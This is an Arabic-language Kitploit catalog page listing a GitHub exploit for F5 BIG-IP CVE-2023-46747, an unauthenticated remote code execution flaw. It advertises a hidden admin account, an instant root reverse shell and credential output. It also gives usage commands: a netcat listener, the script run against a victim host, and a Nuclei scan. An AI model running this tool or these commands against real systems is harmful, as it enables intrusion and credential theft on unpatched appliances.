Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit — #F5-BIG-IP-CVE-2023-46747-Exploit – RCE بدون مصادقة إكسبلويت Python وقالب Nuclei من Raguraman ✓ صدفة عكسية TCP آلية (LHOST/LPORT) ✓ تم اختباره على الإصدارات المتأثرة من BIG-IP 13.x–17.x ⚠️ لاختبار الاختراق المصرح به فقط | Kitploit
أدوات/GitHubGitHub/razzlemouse/f5-big-ip-smuggleshell-cve-2023-46747-exploit
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubrazzlemouse/f5-big-ip-smuggleshell-cve-2023-46747-exploit

F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit

#F5-BIG-IP-CVE-2023-46747-Exploit – RCE بدون مصادقة إكسبلويت Python وقالب Nuclei من Raguraman ✓ صدفة عكسية TCP آلية (LHOST/LPORT) ✓ تم اختباره على الإصدارات المتأثرة من BIG-IP 13.x–17.x ⚠️ لاختبار الاختراق المصرح به فقط

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
41منذ 8 أشهرلم تتم المراجعة بعد

F5 BIG-IP CVE-2023-46747 – ثغرة RCE بدون مصادقة + قشرة عكسية

إصدارا Python3 وNuclei – بواسطة raguraman

ثغرة RCE حرجة بدون مصادقة (CVSS 9.8) عبر AJP وتهريب طلبات HTTP تعمل على جميع إصدارات BIG-IP غير المُصحّحة 13.x → 17.x (بما في ذلك الأحدث 17.1.0.3) التصحيح: https://my.f5.com/manage/s/article/K000137353 (نوفمبر 2023)

شرح لاستغلال حقيقي من العالم الواقعي: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd

الميزات

  • مؤتمت بالكامل (بدون خطوات يدوية)
  • يعمل مع اسم النطاق أو عنوان IP خام
  • ينشئ مستخدمًا مخفيًا بصلاحيات مدير
  • قشرة عكسية فورية عبر TCP (بصلاحيات root)
  • مخرجات نظيفة تتضمن بيانات الاعتماد والرمز المميز (token)

الملفات

  • f5-bigip-cve-2023-46747-revshell.py → سكربت Python3 مستقل (موصى به)
  • CVE-2023-46747-revshell.yaml → قالب Nuclei (اختياري)

الاستخدام – Python3 (الأسرع والأكثر موثوقية)

root@kitploit:~
# 1. Start your listener
nc -lvnp 4444

# 2. Run the exploit (works with IP or domain)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50   YOUR_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com YOUR_IP 4444

# → Instant root shell!

الاستخدام – قالب Nuclei (بديل) Bash # 1. Edit LHOST and LPORT inside the YAML file

2. Start listener

nc -lvnp 4444

3. Scan

nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com

تحذير قانوني

هذه الأداة مخصصة حصريًا لاختبار الأمان المصرح به، مثل:

مهام اختبار الاختراق المعتمدة

عمليات الفريق الأحمر بإذن كتابي

الأبحاث في بيئة مختبرية خاضعة للتحكم

لا تستخدم هذا الاستغلال على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. الاستغلال غير المصرح به غير قانوني وقد يؤدي إلى الملاحقة الجنائية.

باستخدامك لهذه الأداة، فإنك تتحمل كامل المسؤولية عن الامتثال للقوانين السارية. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر.

تنزيل الأداة